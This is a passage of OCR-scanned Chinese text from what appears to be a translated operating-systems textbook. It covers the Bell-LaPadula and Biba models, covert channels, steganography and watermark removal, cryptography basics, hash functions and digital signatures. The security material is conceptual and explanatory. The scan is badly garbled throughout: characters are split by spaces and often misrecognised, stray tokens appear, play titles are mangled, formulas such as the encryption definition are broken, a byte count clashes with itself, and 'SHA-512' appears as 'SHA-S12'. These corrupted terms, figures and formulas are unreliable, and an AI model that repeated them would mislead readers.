也 横向 运行 或 向 上 。 既 然 信息 流 要 么 水 平 ， 要 么 垂直 ， 那 么 任何 从 k 层 开始 的 信息 都 不 可 能 出 现在 更 低 
的 级 别 。 也 就 是 说 ， 没 有 路 径 可 以 让 信息 往 下 运行 ， 这 样 就 保证 了 模型 的 安全 性 。 

Bell-LaPadula 模 型 涉及 组 织 结 构 ， 但 最 终 还 是 需要 操作 系统 来 强制 执行 。 实 现 上 述 模型 的 一 种 方式 
是 为 每 个 用 户 分 配 一 个 安全 级 别 ， 该 安全 级 别 与 用 户 的 认证 信息 (如 UID 和 GID) 一 起 存储 。 在 用 户 登 
录 的 时 候 ，shell 获 取 用 户 的 安全 级 别 ， 且 该 安全 级 别 会 被 shell 创 建 的 所 有 子 进程 继承 下 去 。 如 果 一 个 运 
行 在 安全 级 别 k 之 下 的 进程 试图 访问 一 个 安全 级 别 比 k 高 的 文件 或 对 象 ， 操 作 系 统 将 会 拒绝 这 个 请 求 。 相 
似 地 ， 任 何 试图 对 安全 级 别 低 于 k 的 对 象 执 行 写 操作 的 请 求 也 一 定 会 失败 。 

2. Biba 模 型 

总 结 用 军 方术 语 表 示 的 Bell-LaPadula 模 型 ， 一 个 中 尉 可 以 让 一 个 士兵 把 自己 所 知道 的 所 有 信息 复制 
到 将 军 的 文件 里 而 不 妨碍 安全 。 现 在 让 我 们 把 同样 的 模型 放 在 民用 领域 。 设 想 一 家 公司 的 看 门人 拥有 等 
级 为 1 的 安全 性 ， 程 序 员 拥 有 等 级 为 3 的 安全 性 ， 总 裁 拥有 等 级 为 5 的 安全 性 。 使 用 Bell-LaPadula 模 型 ， 
程序 员 可 以 向 看 门人 询问 公司 的 发 展 规划 ， 然 后 覆 写 总 裁 的 有 关 企业 策 略 的 文件 。 但 并 不 是 所 有 的 公司 
都 热衷 于 这 样 的 模型 。 

Bell-LaPadula 模 型 的 问题 在 于 它 可 以 用 来 保守 机 密 ， 但 不 能 保证 数据 的 完整 性 。 要 保证 数据 的 完整 
性 ， 我 们 需要 更 精确 的 逆向 特性 (Biba, 1977), 

1) 简单 完整 性 规则 : 在 安全 等 级 E 上 运行 的 进程 只 能 写 同 一 等 级 或 更 低 等 级 的 对 象 GAELS). 
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2) 完整 性 * 规则 : 在 安全 等 级 k 上 运行 的 进程 只 能 读 同一 等 级 或 更 高 等 级 的 对 象 (不 能 向 下 读 )。 
这 些 规则 联合 在 一 起 确保 了 程序 员 可 以 根据 公司 总 裁 的 要 求 更 新 看 门人 的 信息 ， 但 反 过 来 不 可 以 。 
当然 ， 有 些 机 构想 同时 拥有 Bell-LaPadula 和 Biba 特 性 ， 但 它们 之 间 是 矛盾 的 ， 所 以 很 难 同 时 满足 。 


9.4.2 隐蔽 信道 

所 有 的 关于 形式 模型 和 可 证 明 的 安全 系统 听 上 去 都 十 分 有 效 ， 但 是 它们 能 否 真正 工作 ? 简单 说 来 是 
不 可 能 的 。 其 至 在 提供 了 合适 安全 模型 并 可 以 证 明 实 现 方 法 完全 正确 的 系统 里 ,仍然 有 可 能 发 生 安 全 泄 
露 。 本 节 将 讨论 已 经 严格 证 明 在 数学 上 泄露 是 不 可 能 的 系统 中 ， 信 息 是 如 何 泄露 的 。 这 些 观点 要 归功 于 
Lampson (1973), 

Lampson 的 模型 最 初 是 通过 单一 分 时 系统 阐述 的 ， 但 在 LAN 和 其 他 一 些 多 用 户 系统 中 也 采用 了 该 模 
型 (包括 在 云 上 运行 的 应 用 )。 该 模型 包含 了 三 个 运行 在 保护 机 器 上 的 进程 。 第 一 个 进程 是 客户 机 进程 ， 
它 让 某 些 工 作 通 过 第 二 个 进程 也 就 是 服务 器 进程 来 完成 。 客 户 机 进程 和 服务 器 进程 不 完全 相互 信任 。 例 
如 ， 服 务 器 的 工作 是 帮助 客户 机 来 填写 税 单 。 客 户 机 会 担心 服务 器 秘密 地 记录 下 它们 的 财务 数据 ， 例 如 ， 
列 出 谁 赚 了 多 少 钱 的 秘密 清单 ， 然 后 转手 倒卖 。 服 务 器 会 担心 客户 机 试图 窃取 有 价值 的 税务 软件 。 

第 三 个 进程 是 协作 程序 ， 该 协作 程序 正在 同 服务 器 合作 来 窃取 客户 机 的 机 密 数 据 。 协 作 程 序 和 服务 
器 显然 是 由 同一 个 人 掌握 的 。 这 三 个 进程 如 图 9-12 所 示 。 这 一 例子 的 目标 是 设计 出 一 种 系统 ， 在 该 系统 
内 服务 器 进程 不 能 把 从 客户 机 进程 合法 获得 的 信息 泄露 给 协作 进程 。Lampson 把 这 一 问题 叫 作 界限 问题 


(confinement problem ) 。 


et oe 封装 后 的 服务 器 


隐蔽 信道 





图 9-12 a) 客户 机 进程 、 服 务 器 进程 和 协作 程序 进程 ，b) 封装 后 的 服务 器 可 以 通过 隐蔽 信道 向 协作 程序 进 
程 泄露 信息 


从 系统 设计 人 员 的 观点 来 说 ， 设 计 目 标 是 采取 某 种 方法 封闭 或 限制 服务 器 ， 使 它 不 能 向 协作 程序 传 
递 信息 。 使 用 保护 矩阵 架构 可 以 较为 容易 地 保证 服务 器 不 会 通过 进程 间 通信 的 机 制 写 一 个 使 得 协作 程序 
可 以 进行 读 访问 的 文件 。 我 们 已 可 以 保证 服务 器 不 能 通过 系统 的 进程 间 通 信 机 制 来 与 协作 程序 通信 。 

遗憾 的 是 ， 系 统 中 仍 存 在 更 为 精巧 的 通信 信道 。 例 如 ， 服 务 器 可 以 尝试 如 下 的 二 进 制 位 流 来 通信 : 
要 发 送 1 时 ， 进 程 在 固定 的 时 间 段 内 竭尽 所 能 执行 计算 操作 ， 要 发 送 0 时 ， 进 程 在 同样 长 的 时 间 段 内 睡眠 。 

协作 程序 能 够 通过 仔细 地 监控 响应 时 间 来 检测 位 流 。 一 般 而 言 ， 当 服务 器 送出 0 时 的 响应 比 送出 1 时 
的 响应 要 好 一 些 。 这 种 通信 方式 叫 作 隐 项 信道 (covert channel), ， 如 图 9-12b 所 示 。 

当然 ， 隐 蔽 信道 同时 也 是 哮 杂 的 信道 ， 包 含 了 大 量 的 外 来 信息 。 但 是 通过 纠 错 码 (如 汉 明 码 或 者 更 复 
杂 的 代码 ) 可 以 在 这 样 嗜 杂 的 信道 中 可 靠 地 传递 信息 。 纠 错 码 的 使 用 使 得 带宽 已 经 很 低 的 隐蔽 信道 变 得 更 
窗 ， 但 仍 有 可 能 泄露 真实 的 信息 。 很 明显 ， 没 有 一 种 基于 对 象 和 矩阵 和 域 的 保护 模式 可 以 防止 这 种 泄露 。 

调节 CPU 的 使 用 率 不 是 唯一 的 隐蔽 信道 , 还 可 以 调制 页 率 (多 个 页 面 错误 表示 1, 没有 页 面 错 误 表 示 0)。 
实际 上 ， 在 一 个 计时 方式 里 ， 几 乎 任何 可 以 降低 系统 性 能 的 途径 都 可 能 是 隐蔽 信道 的 候选 。 如 果 系 统 提供 
了 一 种 锁定 文件 的 方法 ， 那 么 系统 就 可 以 把 锁定 文件 表示 为 1， 解 锁 文 件 表示 为 0。 在 某 些 系统 里 ， 进 程 也 
可 能 检测 到 文件 处 于 不 能 访问 的 锁定 状态 。 这 一 隐蔽 信道 如 图 9-13 所 示 ， 图 中 对 服务 器 和 协作 程序 而 言 ， 
在 某 个 固定 时 间 内 文件 的 锁定 或 未 锁定 都 是 已 知 的 。 在 这 一 实例 中 ， 在 传送 的 秘密 位 流 是 11010100。 

锁定 或 解锁 一 个 预 置 的 文件 ， 且 S 不 是 在 一 个 特别 哮 杂 的 信道 里 ， 并 不 需要 十 分 精确 的 时 序 ， 除 非 
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比特 率 很 慢 。 使 用 一 个 双方 确认 的 通信 协议 可 以 增强 系统 的 可 靠 性 和 性 能 。 这 种 协议 使 用 了 2 个 文件 F1 
和 F2。 这 两 个 文件 分 别 被 服务 器 和 协作 程序 锁定 以 保持 两 个 进程 的 同步 。 当 服务 器 锁定 或 解锁 S 后 ， 它 
将 F1 的 状态 反 置 表示 送出 了 一 个 比特 。 一 旦 协作 程序 读 取 了 该 比特 ， 它 将 F2 的 状态 反 置 告知 服务 器 可 以 
送出 下 一 个 比特 了 ， 直 到 F1 被 再 次 反 置 表示 在 S 中 第 二 个 比特 已 送 达 。 由 于 这 里 没有 使 用 时 序 技术 ， 所 
以 这 种 协议 是 完全 可 靠 的 , 并 且 可 以 在 繁忙 的 系统 内 使 它们 得 以 按 计 划 快 速 地 传递 信息 。 也 许 有 人 会 问 : 
要 得 到 更 高 的 带宽 ， 为 什么 不 在 每 个 比特 的 传输 中 都 使 用 文件 呢 ? 或 者 建立 一 个 字 节 宽 的 信道 ， 使 用 从 
S0 到 S7 共 8 个 信号 文件 ? 


We 
BE os 


wer —-OOOOO00 


时 间 一 ~ 
图 9-13 使 用 文件 加 锁 的 隐蔽 信道 


获取 和 释放 特定 的 资源 (磁带 机 、 绘 图 仪 等 ) 也 可 以 用 于 信号 方式 。 服 务 器 进程 获取 资源 时 发 送 1， 
释放 资源 时 发 送 0。 在 UNIX 里 ， 服 务 器 进程 创建 文件 表示 为 1， 删 除 文件 表示 为 0， 协 作 程序 可 以 通过 系 
统 访问 请 求 来 查看 文件 是 否 存 在 。 即 使 协作 程序 没有 使 用 文件 的 权限 也 可 以 通过 系统 访问 请 求 来 查看 。 
然而 很 不 幸 ， 仍 然 还 存在 许多 其 他 的 隐蔽 信道 。 

Lampson 也 提 到 了 把 信息 泄露 给 服务 器 进程 所 有 者 (A) 的 方法 。 服 务 器 进程 可 能 有 资格 告诉 其 所 
有 者 ， 它 已 经 替 客 户 机 完成 了 多 少 工 作 ， 这 样 可 以 要 求 客户 机 付 账 。 如 ， 假 设 真正 的 计算 值 为 100 美 元 ， 
而 客户 收入 是 53 000 美 元 ， 那 么 服务 器 就 可 以 报告 100.53 美 元 来 通知 自己 的 主人 。 

仅仅 找到 所 有 的 隐蔽 信道 已 经 是 非常 困难 的 了 ， 更 不 用 说 阻止 它们 了 。 实 际 上 ， 没 有 什么 可 行 的 方 
法 。 引 入 一 个 可 随机 产生 页 面 调 用 错误 的 进程 ， 或 为 了 减少 隐蔽 信道 的 带宽 而 花费 时 间 来 降低 系统 性 能 
等 ， 都 不 是 什么 诱 人 的 好 主意 。 

隐 写 术 

另 一 类 稍微 不 同 的 隐蔽 信道 能 够 在 进程 间 传 递 机 密 信息 ， 即 使 人 为 或 自动 的 审查 监视 着 进程 间 的 所 有 信 
息 并 禁止 可 疑 的 数据 传递 。 例 如 ， 假 设 一 家 公司 人 为 地 检查 所 有 发 自 公 司职 员 的 电子 邮件 来 确保 没有 机 密 泄 
露 给 公司 外 的 竞争 对 手 或 同谋 。 雇 员 是 否 有 办 法 在 审查 者 的 鼻子 下 面 偷 带 出 机 密 的 信息 呢 ? 结果 是 可 能 的 ， 
同时 也 并 不 是 很 难 做 。 

让 我 们 用 例子 来 证 明 。 请 看 图 9-14a， 这 是 一 张 在 肯尼亚 拍摄 的 照片 ， 照 片上 有 三 只 斑马 在 注视 着 
金 合 欢 树 。 图 9-14b 看 上 去 和 图 9-14a 差 不 多 ， 但 是 却 包 含 了 附加 的 信息 。 这 些 信息 是 完整 而 未 被 删节 的 
五 部 未 士 比 亚 戏剧 : COME) (ERE) BETA) (RUE AD M CREDIT - 恺 撒 》。 这 些 戏 剧 总 
共 加 起 来 超过 700KB 的 文本 。 





图 9-14 a) 三 只 斑马 和 一 棵 树 ，b) 三 只 议 马 、 一 棵 树 以 及 五 部 莎士比亚 完整 的 戏剧 


350 g9 


隐蔽 信道 是 如 何 工作 的 呢 ? 原来 的 彩色 图 片 是 1024 x 768 像 素 的 。 每 个 像素 包括 三 个 8 位 数字 ， 分 别 代 
表 红 、 绿 、 蓝 三 原色 的 亮度 。 像 素 的 颜色 是 通过 三 原色 的 线性 重合 形成 的 。 编 码 程 序 使 用 每 个 RGB 色 度 的 
低位 作为 隐 项 信道 。 这 样 每 个 像素 就 有 三 位 的 秘密 空间 存放 信息 ， 一 个 在 红色 色 值 里 ,一 个 在 绿色 色 值 里 ， 
一 个 在 蓝 色色 值 里 。 这 种 情况 下 ， 图 片 大 小 将 增加 1024 x 768 x 3 位 或 294 912 个 字 节 的 空间 来 存放 信息 。 

五 部 戏剧 和 一 份 简短 说 明 加 起 来 有 734 891 个 字 节 。 这 些 内 容 首 先 被 标准 的 压缩 算法 压缩 到 274KB,， 
压缩 后 的 文件 加 密 后 被 插入 到 每 个 色 值 的 低位 中 。 正 如 我 们 所 看 到 的 (实际 上 看 不 到 )， 存 放 的 信息 完 
全 是 不 可 见 的 ， 在 放大 的 、 全 彩 的 照片 里 也 是 不 可 见 的 。 一 旦 图 片 文件 通过 了 审查 ， 接 收 者 就 剥离 低位 
数据 ， 利 用 解码 和 解压 缩 算 法 还 原 出 743 891 个 字 节 。 这 种 隐藏 信息 的 方法 叫 作 隐 写 术 (steganography, 
来 自 于 希腊 语 “隐蔽 8 书写" ) 。 隐 写 术 在 那些 试图 限制 公民 通信 自由 的 独裁 统治 国家 里 不 太 流 行 ， 但 在 那 
些 非常 有 言论 自由 的 国家 里 却 十 分 流行 。 

在 低 分 辨 率 下 观看 这 两 张 黑白 照片 并 不 能 让 人 领略 隐 写 术 的 高 超 技巧 。 要 更 好 地 理解 隐 写 术 的 工作 
原理 ， 作 者 提供 了 一 个 Windows 系 统 下 的 范例 ， 它 包含 有 图 9-14b 中 的 图 像 。 这 一 范例 可 以 在 
www.cs.vu.nl/~ast/ 上 找到 。 只 要 点 击 covered writing 下 面 以 STEGANOGRAPHY DEMO 开头 的 链接 即 可 。 
页 面 上 会 指导 用 户 下 载 图 片 和 所 需 的 隐 写 术 工具 来 解读 戏剧 文本 。 虽 然 难以 置信 ， 但 请 尝试 一 下 吧 ， 眼 
见 为 实 。 

另 一 个 隐 写 术 的 使 用 是 把 隐藏 的 水 印 插入 网 页 上 的 图 片 中 以 防止 窃取 者 用 在 其 他 的 网 页 上 。 如 果 你 
网 页 上 的 图 片 包 含 以 下 秘密 信息 :“Copyright 2008, General Images Corporation”， 你 就 很 难说 服 法 官 这 
是 你 自己 制作 的 图 片 。 音 乐 、 电 影 和 其 他 素材 都 可 以 通过 加 入 水 印 来 防止 窃取 。 

当然 ， 水 印 的 使 用 也 鼓励 人 们 想 办 法 去 除 它 们 。 通 过 下 面 的 方法 可 以 攻击 在 像素 低位 嵌入 信息 的 技 
R: 首先 把 图 像 顺 时 针 转 动 1 度 ， 然 后 把 它 转 换 为 JPEG 这 样 有 损耗 的 图 片 格式 ， 再 逆 时 针 转 1 度 ， 最 后 
图 片 被 转换 为 原来 的 格式 (如 gif、bmp、tif 等 )。 有 损耗 的 JPEG 格 式 会 通过 浮 点 计算 来 混合 处 理 像素 的 
低位 ， 这 样 会 导致 四 舍 五 入 的 发 生 ， 同 时 在 低位 增加 了 噪声 信息 。 不 过 ， 放 置 水 印 的 人 们 也 考虑 (或 者 
应 该 考虑 ) 到 了 这 种 情况 ， 所 以 他 们 重复 地 嵌入 水 印 并 使 用 其 他 的 一 些 方法 。 这 反 过 来 又 促使 了 攻击 者 
寻找 更 好 的 手段 去 除 水 印 。 结 果 ， 这 样 的 对 抗 周而复始 。 

隐 写 技术 可 以 被 用 于 隐蔽 地 泄露 信息 ， 但 是 ， 人 们 通常 更 希望 它 能 够 在 相反 的 领域 发 挥 作用 。 人 们 
希望 使 用 隐 写 技术 可 以 避免 攻击 者 窥探 信息 ， 而 不 必 自 己 去 隐藏 持 有 信息 这 一 事实 。 如 Julius Caesar, 
即使 确定 信息 或 文件 已 误 入 他 手 ， 攻 击 者 同样 不 能 获取 我 们 的 秘密 信息 ， 这 已 经 属于 密码 学 范畴 ， 亦 是 
后 续 章 节 的 主题 。 


9.5 密码 学 原理 


加 密 在 安全 领域 扮演 着 非常 重要 的 角色 。 很 多 人 对 于 报纸 上 的 字谜 (newspaper cryptograms) 都 不 
陌生 ， 这 种 加 密 算法 不 过 是 一 个 字谜 游戏 ， 其 中 明文 中 的 每 个 字母 被 替换 为 另 一 个 字母 。 这 种 加 密 算法 
与 现代 加 密 算法 有 着 非常 紧密 的 关联 (就 像 热狗 与 高 级 豪 饪 术 之 间 的 关系 一 样 )。 在 本 节 中 我 们 将 鸟 葡 
计算 机 时 代 的 密码 学 ， 正 如 前 文 所 述 ， 操 作 系统 在 很 多 地 方 都 用 到 了 密码 学 原理 ， 例 如 一 些 文件 系统 可 
以 为 硬盘 上 的 所 有 数据 进行 加 密 ， 同 时 ， 像 IPSec 这 样 的 协议 可 以 加 密 网 络 数据 包 中 的 “和 ”/“ 或 ” 信 
号 。 大 多 数 操作 系统 会 打 乱 密码 ， 以 防止 攻击 者 恢复 它们 。 同 时 ， 本 书 会 在 9.6 节 中 介绍 操作 系统 中 加 
密 技术 的 另 一 用 武之 地 : 验证 。 

我 们 将 会 深入 讨论 这 些 系 统 所 使 用 的 基本 原 语 。 但 是 ， 对 密码 学 的 详细 站 述 超 越 了 本 书 的 范围 。 不 
过 ， 许 多 优秀 的 书籍 都 详细 讨论 了 这 一 话题 ， 有 兴趣 的 读者 可 以 参考 (如 Kaufman 等 人 2002 年 的 作品 ， 
以 及 Gollman 于 2011 年 出 版 的 书籍 ) 。 接 下 来 ， 我 们 为 不 太 熟 悉 密码 学 的 读者 做 一 个 快速 简介 。 

加 密 的 目的 是 将 明文 一 一 也 就 是 原始 信息 或 文件 ， 通 过 某 种 手段 变 为 密 文 ， 通 过 这 种 手段 ， 只 有 经 
过 授权 的 人 才 知 道 如 何 将 密 文 恢复 为 明文 。 对 无 关 的 人 来 说 ， 密 文 是 一 段 无 法 理解 的 编码 。 虽 然 这 一 领 
域 对 初学 者 来 说 听 上 去 比较 新 奇 ， 但 是 加 密 和 解密 算法 (函数 ) 往往 是 公开 的 。 要 想 确 保 加 密 算法 不 被 
泄露 是 徒劳 的 ， 否 则 就 会 使 一 些 想 要 保密 数据 的 人 对 系统 的 安全 性 产生 错误 理解 。 在 专业 上 ， 这 种 策略 
叫 作 模糊 安全 (security by obscurity ) ， 而 且 只 有 安全 领域 的 爱好 者 们 才 使 用 该 策略 。 奇 怪 的 是 ， 在 这 些 
爱好 者 中 也 包括 了 许多 跨国 公司 ， 但 是 他 们 应 该 是 了 解 更 多 专业 知识 的 。 
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在 算法 中 使 用 的 加 密 参 数 叫 作 密 钥 (key)。 如 果 P 代 表明 文 ，Ks 代 表 加 密 密 钥 ，C 代 表 密 文 ，E 代 表 
加 密 算法 ( 即 ， 函 数 )， 那 么 C = EP, Ke)。 这 就 是 加 密 的 定义 。 其 含义 是 把 明文 P 和 加 密 密 钥 Ks 作为 参 
数 ， 通 过 加 密 算 法 E 就 可 以 把 明文 变 为 密 文 。 荷 兰 密码 学 家 Kerckhoffs 于 19 世 纪 提 出 了 Kerckhoffs 原 则 。 
该 原则 认为 ， 加 密 算法 本 身 应 该 完全 公开 ， 而 加 密 的 安全 性 由 独立 于 加 密 算法 之 外 的 密 钥 决 定 。 现 在 所 
有 严谨 的 密码 学 家 都 遵循 这 一 原则 。 , 

同样 地 ， 当 DD 表示 解 密 算法 ，Kb 表 示 解 密 密 钥 时 ，P = D(C, Kp)。 也 就 是 说 ， 要 想 把 密 文 还 原 成 明文 ， 
可 以 用 密 文 C 和 解密 密 钥 Kb 作为 参数 ， 通 过 解密 算法 D 进 行 运算 。 这 两 种 互 逆 运 算 间 的 关系 如 图 9-15 所 示 。 
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图 9-15 明文 和 密 文 间 的 关系 


9.5.1 私 钥 加 密 技 术 

为 了 描述 得 更 清楚 些 ， 我 们 假设 在 某 一 个 加 密 算法 里 每 一 个 字母 都 由 另 一 个 不 同 的 字母 替代 ， 如 所 
有 的 A 被 Q 替 代 ， 所 有 的 B 被 W 替 代 ， 所 有 的 C 被 E 替 代 ， 以 下 依次 类 推 : 

Wx: ABCDEFGHIJKLMNOPQRSTUVWXYZ 

x: QWERTYUIOPASDFGHJKLZXCVBNM 

这 种 密 钥 系统 叫 作 单 字母 替换 ，26 个 字母 与 整个 字母 表 相 匹配 。 在 这 个 实例 中 的 加 密 密 钥 为 : 
QWERTYUIOPASDFGHJKLZXCVBNM。 利 用 这 样 的 密 钥 ， 我 们 可 以 把 明文 ATTACK 转 换 为 QZZQEA。 
同时 ， 利 用 解密 密 钥 可 以 告诉 我 们 如 何 把 密 文 恢复 为 明文 。 在 这 个 实例 中 的 解密 密 钥 为 : 
KXVMCNOPHQRSZYIJADLEGWBUFT。 我 们 可 以 看 到 密 文中 的 A 是 明文 中 的 K， 密 文中 的 B 是 明文 中 
的 X， 其 他 字母 依次 类 推 。 

从 表面 上 看 ， 这 是 一 个 安全 的 密 钥 机 制 ， 因 为 密码 破译 者 虽然 知道 普通 密 钥 机 制 (字母 与 字母 间 的 
替换 ) ， 但 他 并 不 知道 26!= 4x 10”* 中 哪 一 个 是 可 能 的 密 钥 。 但 是 ， 给 定 一 小 段 密 文 ， 这 个 密码 还 是 能 够 
被 轻易 破译 掉 。 破 译 的 基础 在 于 利用 了 自然 语言 的 统计 特性 。 在 英语 中 ， 如 e 是 最 常用 的 字母 ， 接 下 来 是 
t、0、a、n、i 等 。 最 常用 的 双 字 母 组 合 有 也 、in、er、re 等 。 利 用 这 类 信息 ， 破 译 该 密码 是 较为 容易 的 。 

许多 类 似 的 密 钥 系统 都 有 这 样 一 个 特点 ， 那 就 是 给 定 了 加 密 密 钥 就 能 够 较为 容易 地 找到 解密 密 钥 ， 
反之 亦 然 。 这 样 的 系统 采用 了 私 钥 加 密 技术 或 对 称 密 钥 加 密 技 术 。 虽 然 单字 母 替 换 方式 没有 使 用 价值 ， 
但 是 如 果 密 钥 有 足够 的 长 度 ， 对 称 密 钥 机 制 还 是 相对 比较 安全 的 。 对 严格 的 安全 系统 来 说 ， 最 少 需 要 使 
用 256 位 密 钥 ， 因 为 它 的 破译 空间 为 2“~ 1.2 x 10”。 短 密 钥 只 能 够 抵挡 业余 爱好 者 ， 对 政府 部 门 来 说 却 
是 不 安全 的 。 
9.5.2 公 钥 加 密 技 术 

由 于 对 信息 进行 加 密 和 解密 的 运算 量 是 可 控制 的 ， 所 以 私 钥 加 密 体 系 十 分 有 用 。 但 是 它 也 有 一 个 缺 
陷 : 发 送 者 与 接受 者 必须 同时 拥有 密 钥 。 他 们 甚至 必须 有 物理 上 的 接触 ， 才 能 传递 密 钥 。 为 了 解决 这 个 
了 矛盾， 人们 引入 了 公 钥 加 密 技术 (1976 年 由 Diffie 和 Hellman 提 出 )。 这 一 体系 的 特点 是 加 密 密 钥 和 解密 
密 钥 是 不 同 的 ， 并 且 当 给 出 了 一 个 筛选 过 的 加 密 密 钥 后 不 可 能 推出 对 应 的 解密 密 钥 。 在 这 种 特性 下 ， 加 
密 密 钥 可 被 公开 而 只 有 解密 密 钥 处 于 秘密 状态 。 

为 了 让 大 家 感受 一 下 公 钥 密码 体制 ， 请 看 下 面 两 个 问题 : 
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问题 1: 314159265358979 x 314159265358979% F & “>? 

问题 2: 3912571506419387090594828508241 的 平方 根 是 多 少 ? 

如 果 给 一 张 纸 和 一 支 笔 ， 加 上 一 大 杯 冰 激 凌 作为 正确 答案 的 奖励 ， 那 么 大 多 数 六 年 级 学 生 可 以 在 一 
两 个 小 时 内 做 出 问题 1 的 答案 。 而 如 果 给 一 般 成 年 人 纸 和 笔 ， 并 许诺 回答 出 正确 答案 可 以 免 去 终身 50% 
税收 的 话 ， 大 多 数 人 还 是 不 能 在 没有 计算 器 、 计 算 机 或 其 他 外 界 帮助 的 条 件 下 解答 出 问题 2 的 答案 。 虽 
然 平 方 和 求 平方 根 互 为 逆 运 算 , 但 是 它们 在 计算 的 复杂 性 上 却 有 很 大 差异 。 这 种 不 对 称 性 构成 了 公 钥 密 
码 体 系 的 基础 。 在 公 钥 密码 体系 中 ， 加 密 运 算 比 较 简 单 ， 而 没有 密 钥 的 解密 运算 却 十 分 繁琐 。 

一 种 叫 作 RSA 的 公 角 机制 表明 : 对 计算 机 来 说 ， 大 数 乘 法 比 对 大 数 进行 因 式 分 解 要 容易 得 多 ， 特 别 
是 在 使 用 取 模 算法 进行 运算 且 每 个 数字 都 有 上 百 位 时 (Rivest A, 1978)。 这 种 机 制 广泛 应 用 于 密码 领 
域 。 其 他 广泛 使 用 的 还 有 离散 对 数 (El Gamal, 1985)。 公 钥 机 制 的 主要 问题 在 于 运算 速度 要 比 对 称 密 钥 
机 制 慢 数 千 倍 。 

当 我 们 使 用 公 钥 密码 体系 时 ， 每 个 人 都 拥有 一 对 密 钥 〈 公 钥 和 私 钥 ) 并 把 其 中 的 公 钥 公开 。 公 钥 是 
加 密 密 钥 ， 私 钥 是 解密 密 钥 。 通 常 密 钥 的 运算 是 自动 进行 的 ， 有 时 候 用 户 可 以 自选 密码 作为 算法 的 种 子 。 
在 发 送 机 密 信息 时 ， 用 接收 方 的 公 钥 将 明文 加 密 。 由 于 只 有 接收 方 拥有 私 钥 ， 所 以 也 只 有 接收 方 可 以 解 
密 信 息 。 

9.5.3 单 向 函数 

在 接 下 来 的 许多 情况 下 ， 我 们 将 看 到 有 些 函数 /， 其 特性 是 给 定 f 和 参数 x， 很 容易 计算 出 y = f (x)。 
但 是 给 定 f (x)， 要 找到 相应 的 x 却 不 可 行 。 这 种 函数 采用 了 十 分 复杂 的 方法 把 数字 打 乱 。 具 体 做 法 可 以 
首先 将 ?初始 化 为 r。 然 后 可 以 有 一 个 循环 ， 进 行 多 次 迭代 ， 只 要 在 x 中 有 1 位 就 继续 迭代 ， 随 着 每 次 迭代 ， 
y 中 的 各 位 的 排列 以 与 从 代 相关 的 方式 进行 ， 每 次 迭代 时 添加 不 同 的 常数 ， 最 终生 成 了 彻底 打 乱 位 的 数 
字 排 列 。 这 样 的 函数 叫 作 加 密 散 列 函 数 。 


95.4 数字 签名 

经 常 性 地 使 用 数字 签名 是 很 有 必要 的 。 例 如 ， 假 设 银行 客户 通过 发 送 电子 邮件 通知 银行 为 其 购买 股 
票 。 一 小 时 后 ， 订 单 发 出 并 成 交 ， 但 随后 股票 大 跌 了 。 现 在 客户 否认 曾经 发 送 过 电子 邮件 。 银 行当 然 可 
以 出 示 电 子 邮 件 作 为 证 据 ， 但 是 客户 也 可 以 声称 是 银行 为 了 获得 佣金 而 伪造 了 电子 邮件 。 那 么 法 官 如 何 
来 找到 真相 呢 ? 

通过 对 邮件 或 其 他 电子 文档 进行 数字 签名 可 以 解决 这 类 问题 ， 并 且 保 证 了 发 送 方 日 后 不 能 抵赖 。 其 
中 的 一 个 通常 使 用 的 办 法 是 首先 对 文档 运行 一 种 单 向 散 列 运算 (hashing), ， 这 种 运算 几乎 是 不 可 逆 的 。 
散 列 函数 通常 独立 于 原始 文档 长 度 产 生 一 个 固定 长 度 的 结果 值 。 最 常用 的 散 列 函数 有 MD5 (Message 
Digest 5) ， 一 种 可 以 产生 16 个 字 节 结果 的 算法 (Rivest, 1992) 以 及 SHA-1 (Secure Hash Algorithm), 
一 种 可 以 产生 20 个 字 节 结果 的 算法 (NIST，1995)。 比 SHA-1 更 新 版 本 有 SHA-256 和 SHA-S12， 它 们 分 
别 产 生 32 字 节 和 64 字 节 的 散 列 结果 ， 但 是 迄今 为 止 ， 这 两 种 加 密 算法 依然 没有 得 到 广泛 使 用 。 

下 一 步 假设 我 们 使 用 上 面 讲 过 的 公 钥 密码 。 文 件 所 有 者 利用 他 的 私 钥 对 散 列 值 进行 运算 得 到 D( 散 列 值 )。 
该 值 称 为 签名 块 (signature block)， 它 被 附加 在 文档 之 后 传送 给 接收 方 ， 如 图 9-16 所 示 。 对 散 列 值 应 用 D 有 些 
像 散 列 解密 ， 但 这 并 不 是 真正 意义 上 的 解密 ， 因 为 散 列 值 并 没有 被 加 密 。 这 不 过 是 对 散 列 值 进 行 的 数学 变换 。 





对 散 列 值 运 
文档 压缩 后 
得 到 散 列 值 算得 到 D 





D ( 散 列 值 ) 原始 文档 
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图 9-16 a) 对 签名 块 进行 运算 ，b) 接收 方 获取 的 信息 
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接收 方 收 到 文档 和 散 列 值 后 ， 首 先 使 用 事先 取得 一 致 的 MD5 或 SHA 算 法 计算 文档 的 散 列 值 ， 然 后 
接收 方 使 用 发 送 方 的 公 角 对 签名 块 进行 运算 以 得 到 E(D(hash))。 这 实际 上 是 对 解密 后 的 散 列 进行 “加 密 ”， 
操作 抵消 ， 以 恢复 原 有 的 散 列 。 如 果 计 算 后 的 散 列 值 与 签名 块 中 的 散 列 值 不 一 致 ， 则 表明 文档 和 签名 块 
中 的 一 个 或 两 者 同时 被 自 改 过 。 这 种 方法 仅仅 对 一 小 部 分 数据 ( 散 列 ) 运用 了 ( 慢 速 的 ) 公 钥 密码 体制 。 
请 注意 这 种 方法 仅仅 对 所 有 满足 下 面条 件 的 x 起 作用 : 

E(D(x)) =x 
我 们 并 不 能 保证 所 有 的 加 密 函 数 都 拥有 这 种 属性 ， 因 为 我 们 原来 所 要 求 的 就 是 : 
D(E(x)) =x 


在 这 里 ，E 是 加 密 函 数 ，D 是 解密 函数 。 而 为 了 满足 签名 的 要 求 ， 函 数 运算 的 次 序 是 不 受 影响 的 。 
也 就 是 说 ，D 和 EE 一定 是 可 交换 的 函数 。 而 RSA 算 法 就 有 这 种 属性 。 

要 使 用 这 种 签名 机 制 ， 接 收 方 必须 知道 发 送 方 的 公 钥 。 有 些 用 户 在 其 Web 网 页 上 公开 他 们 的 公 钥 ， 
但 是 其 他 人 并 没有 这 么 做 ， 因 为 他 们 担心 人 侵 者 会 问 入 并 悄悄 地 改动 其 公 钥 。 对 他 们 来 说 ， 需 要 其 他 方 
法 来 发 布 公 钥 。 消 息 发 送 方 的 一 种 常用 方法 是 在 消息 后 附加 数字 证 书 ， 证 书 中 包含 了 用 户 姓名 、 公 钥 和 
